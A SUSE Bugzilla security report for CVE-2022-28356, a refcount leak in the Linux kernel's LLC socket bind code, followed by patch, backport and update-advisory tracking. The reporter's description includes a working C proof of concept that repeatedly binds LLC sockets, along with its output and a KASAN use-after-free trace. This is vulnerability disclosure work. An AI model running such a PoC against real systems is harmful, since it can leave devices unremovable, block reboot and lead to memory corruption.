Bug 1197391 - (CVE-2022-28356) VUL-0: CVE-2022-28356: kernel-source: refcount leak in llc_ui_bind and llc_ui_autobind
(CVE-2022-28356)
VUL-0: CVE-2022-28356: kernel-source: refcount leak in llc_ui_bind and llc_ui...
Status: IN_PROGRESS
: 1197390 (view as bug list)
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P2 - High : Normal
: ---
Assigned To: Denis Kirjanov
Security Team bot
https://smash.suse.de/issue/326949/
CVSSv3.1:SUSE:CVE-2022-28356:5.5:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2022-03-22 10:50 UTC by Gianluca Gabrielli
Modified: 2022-09-16 19:27 UTC (History)
8 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
gabriele.sonnu: needinfo? (mkubecek)


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Gianluca Gabrielli 2022-03-22 10:50:20 UTC
Sent directly to security@suse.de
---------------------------------

I found a refcount leak bug in llc_ui_bind() from /net/llc/af_llc.c. In this function, if it finds an ARPHRD_ETHER type net device, it will hold the device's refcount:

'''
if (sk->sk_bound_dev_if) {
llc->dev = dev_get_by_index_rcu(&init_net, sk->sk_bound_dev_if);
if (llc->dev) {
if (is_zero_ether_addr(addr->sllc_mac))
memcpy(addr->sllc_mac, llc->dev->dev_addr,
      IFHWADDRLEN);
if (addr->sllc_arphrd != llc->dev->type ||
   !ether_addr_equal(addr->sllc_mac,
     llc->dev->dev_addr)) {
rc = -EINVAL;
llc->dev = NULL;
}
}
} else
llc->dev = dev_getbyhwaddr_rcu(&init_net, addr->sllc_arphrd,
  addr->sllc_mac);
dev_hold_track(llc->dev, &llc->dev_tracker, GFP_ATOMIC);
'''

but doesn't release the device if it fails to find a usable sap later:

'''
sap = llc_sap_find(addr->sllc_sap);
if (!sap) {
sap = llc_sap_open(addr->sllc_sap, NULL);
rc = -EBUSY; /* some other network layer is using the sap */
if (!sap)
goto out;
} else {
        ...
out_put:
llc_sap_put(sap);
out:
release_sock(sk);
'''

If we call llc_ui_bind() on a socket multiple times and provide it a used sllc_sap each time, the device's refcount will be increased unexpectedly, and the device cannot be removed then.
A simple PoC code is as below:

'''
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/llc.h>
#include <time.h>

#define REVISE_NUM 20
#define ARPHRD_ETHER 1

int main(void)
{
    int s1, s2, ret, i;
    char eth0[] = {0, 0, 0, 0, 0, 0}; // change it
    int try;
    struct sockaddr_llc addr;

    memset(&addr, 0, sizeof(struct sockaddr_llc));
    addr.sllc_family = AF_LLC;
    addr.sllc_arphrd = ARPHRD_ETHER;
    memcpy(addr.sllc_mac, eth0, 6);
    addr.sllc_sap = 20;

    s1 = socket(PF_LLC, SOCK_STREAM, 0);
    s2 = socket(PF_LLC, SOCK_STREAM, 0);

    printf("s1 = %d, s2 = %d\n", s1, s2);


    ret = bind(s1, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind1 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind2 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind3 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind4 return %d\n", ret);

    close(s1);
    close(s2);

    return 0;
}
'''

After executing the poc above, we can neither remove the bounded net_device nor reboot the OS. The PoC is tested on Linux-5.17-rc5:

'''
/ # /home/pwn/exp
s1 = 3, s2 = 4
bind1 return 0
bind2 return -1
bind3 return -1
bind4 return -1
/ #
/ # reboot
/ #
/ # rmmod e1000
[  185.976235] unregister_netdevice: waiting for eth0 to become free. Usage count = 3
[  196.056399] unregister_netdevice: waiting for eth0 to become free. Usage count = 3
'''

An attacker can leverage this flaw to trigger an integer overflow on the device's refcount and eventually lead to a use-after-free bug:

'''
[   97.850647] ==================================================================
[   97.850647] BUG: KASAN: use-after-free in llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647] Read of size 2 at addr ffff88803e9b2128 by task swapper/2/0
[   97.850647]
[   97.850647] CPU: 2 PID: 0 Comm: swapper/2 Tainted: G            E     5.17.0-rc5 #2
[   97.850647] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[   97.850647] Call Trace:
[   97.850647]  <IRQ>
[   97.850647]  dump_stack_lvl+0x89/0xb5
[   97.850647]  print_address_description.constprop.0+0x24/0x150
[   97.850647]  ? llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  kasan_report.cold+0x82/0xdb
[   97.850647]  ? llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  __asan_report_load2_noabort+0x14/0x20
[   97.850647]  llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  ? llc_conn_set_p_flag+0xf0/0xf0 [llc2]
[   97.850647]  llc_conn_ac_send_sabme_cmd_p_set_x+0x56/0x470 [llc2]
[   97.850647]  ? __sanitizer_cov_trace_switch+0x54/0x90
[   97.850647]  ? llc_conn_set_p_flag+0xf0/0xf0 [llc2]
[   97.850647]  llc_conn_state_process+0x3fa/0x13f0 [llc2]
[   97.850647]  llc_conn_tmr_common_cb+0x2c0/0x6d0 [llc2]
[   97.850647]  ? llc_conn_busy_tmr_cb+0x30/0x30 [llc2]
[   97.850647]  llc_conn_ack_tmr_cb+0x23/0x30 [llc2]
[   97.850647]  call_timer_fn+0x46/0x290
[   97.850647]  ? llc_conn_busy_tmr_cb+0x30/0x30 [llc2]
[   97.850647]  __run_timers.part.0+0x6b0/0x9b0
[   97.850647]  ? call_timer_fn+0x290/0x290
[   97.850647]  ? __sanitizer_cov_trace_cmp4+0x16/0x20
[   97.850647]  ? ktime_get+0xff/0x150
[   97.850647]  ? lapic_next_event+0x5b/0x90
[   97.850647]  ? __sanitizer_cov_trace_const_cmp4+0x16/0x20
[   97.850647]  ? clockevents_program_event+0x14a/0x390
[   97.850647]  run_timer_softirq+0xb8/0x1b0
[   97.850647]  __do_softirq+0x1ac/0x5af
[   97.850647]  __irq_exit_rcu+0xd9/0x190
[   97.850647]  irq_exit_rcu+0xe/0x10
[   97.850647]  sysvec_apic_timer_interrupt+0x98/0xb0
[   97.850647]  </IRQ>
[   97.850647]  <TASK>
[   97.850647]  asm_sysvec_apic_timer_interrupt+0x12/0x20
[   97.850647] RIP: 0010:native_safe_halt+0xb/0x10
'''

The function llc_ui_autobind() has the same issue.
Comment 2 Marcus Meissner 2022-03-22 10:58:40 UTC
*** Bug 1197390 has been marked as a duplicate of this bug. ***
Comment 4 Gianluca Gabrielli 2022-03-28 13:17:54 UTC
The patch is now merged in mainline at 764f4eb6846f5475f1244767d24d25dd86528a4a.
Comment 5 Gianluca Gabrielli 2022-03-28 13:28:29 UTC
All our branches are affected, please backport the patch.
Comment 7 Gianluca Gabrielli 2022-04-04 07:23:37 UTC
CVE-2022-28356 assigned by MITRE
Comment 17 Gianluca Gabrielli 2022-04-06 12:23:23 UTC
published in osss
Comment 22 Swamp Workflow Management 2022-04-19 13:30:28 UTC
SUSE-SU-2022:1255-1: An update that solves 20 vulnerabilities, contains one feature and has three fixes is now available.

Category: security (important)
Bug References: 1189562,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197131,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-0886,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise Server 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1, kernel-zfcpdump-4.12.14-150000.150.89.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-livepatch-SLE15_Update_29-1-150000.1.3.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150000.150.89.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Swamp Workflow Management 2022-04-19 13:35:12 UTC
SUSE-SU-2022:1256-1: An update that solves 19 vulnerabilities, contains two features and has 6 fixes is now available.

Category: security (important)
Bug References: 1189562,1193738,1194943,1195051,1195254,1195353,1196018,1196114,1196433,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234,SLE-23652
Sources used:
openSUSE Leap 15.4 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
openSUSE Leap 15.3 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-livepatch-SLE15-SP1_Update_30-1-150100.3.3.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1
SUSE Enterprise Storage 6 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE CaaS Platform 4.0 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 24 Swamp Workflow Management 2022-04-19 16:29:51 UTC
SUSE-SU-2022:1266-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.94.1, kernel-source-azure-4.12.14-16.94.1, kernel-syms-azure-4.12.14-16.94.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 25 Swamp Workflow Management 2022-04-19 16:34:03 UTC
SUSE-SU-2022:1267-1: An update that solves 20 vulnerabilities, contains one feature and has 7 fixes is now available.

Category: security (important)
Bug References: 1180153,1189562,1193738,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196573,1196639,1196761,1196830,1196836,1196942,1196973,1197211,1197227,1197331,1197366,1197391,1197462,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE OpenStack Cloud 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kgraft-patch-SLE12-SP4_Update_26-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.96.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Swamp Workflow Management 2022-04-26 10:23:05 UTC
SUSE-SU-2022:1402-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.84.1, kernel-rt_debug-4.12.14-10.84.1, kernel-source-rt-4.12.14-10.84.1, kernel-syms-rt-4.12.14-10.84.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 37 Swamp Workflow Management 2022-05-16 13:23:26 UTC
SUSE-SU-2022:1669-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
SUSE Linux Enterprise Realtime Extension 15-SP3 (src):    release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.88.2, kernel-rt_debug-5.3.18-150300.88.2, kernel-source-rt-5.3.18-150300.88.2, kernel-syms-rt-5.3.18-150300.88.1, release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.88.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.88.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 38 Swamp Workflow Management 2022-05-16 13:27:23 UTC
SUSE-SU-2022:1668-1: An update that solves 13 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1195651,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.89.1, kernel-rt_debug-4.12.14-10.89.1, kernel-source-rt-4.12.14-10.89.1, kernel-syms-rt-4.12.14-10.89.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 39 Swamp Workflow Management 2022-05-16 13:37:19 UTC
SUSE-SU-2022:1676-1: An update that solves 16 vulnerabilities, contains 6 features and has 25 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1121726,1137728,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197914,1197926,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198660,1198742,1198825,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-15176,SLE-8449
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 40 Swamp Workflow Management 2022-05-16 16:23:41 UTC
SUSE-SU-2022:1687-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-64kb-5.3.18-150300.59.68.1, kernel-debug-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-docs-5.3.18-150300.59.68.1, kernel-kvmsmall-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-obs-qa-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-livepatch-SLE15-SP3_Update_18-1-150300.7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 41 Swamp Workflow Management 2022-05-16 16:28:30 UTC
SUSE-SU-2022:1686-1: An update that solves 13 vulnerabilities and has 16 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.121.2
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.121.2, kernel-obs-build-4.12.14-122.121.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kernel-source-4.12.14-122.121.2, kernel-syms-4.12.14-122.121.2
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kgraft-patch-SLE12-SP5_Update_31-1-8.5.2
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.121.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 48 Petr Mladek 2022-06-24 10:38:04 UTC
The fix is still missing in the following branches:

    SLE15-SP4, cve/linux-2.6.32, cve/linux-3.0

Or they affected, please?
Comment 50 Takashi Iwai 2022-08-12 12:58:28 UTC
Adding Denis to Cc, in case he can have spare time for handling this.

FWIW, the backport to both SLE15-SP4 and cve/linux-3.0 look pretty straightforward, just picking up the existing backport patch from cve/linux-5.3 or cve/linux-4.4 should suffice.  (The upstream change itself can't be applied due to the lack of dev_put_track() API function.)
Comment 51 Denis Kirjanov 2022-08-31 13:03:39 UTC
(In reply to Takashi Iwai from comment #50)
> Adding Denis to Cc, in case he can have spare time for handling this.
> 
> FWIW, the backport to both SLE15-SP4 and cve/linux-3.0 look pretty
> straightforward, just picking up the existing backport patch from
> cve/linux-5.3 or cve/linux-4.4 should suffice.  (The upstream change itself
> can't be applied due to the lack of dev_put_track() API function.)

pushed to cve/linux-3.0, cve/linux-3.12 and SLE15-SP4
Comment 56 Swamp Workflow Management 2022-09-16 13:22:31 UTC
SUSE-SU-2022:3288-1: An update that solves 25 vulnerabilities, contains four features and has 91 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1189999,1190497,1192968,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198577,1198702,1198971,1199356,1199515,1200301,1200313,1200431,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201361,1201442,1201455,1201489,1201610,1201726,1201768,1201865,1201940,1201948,1201956,1202094,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202872,1202898,1202989,1203036,1203041,1203063,1203098,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-1184,CVE-2022-20368,CVE-2022-20369,CVE-2022-2585,CVE-2022-2588,CVE-2022-26373,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-19359,SLE-23766,SLE-24572,SLE-24682
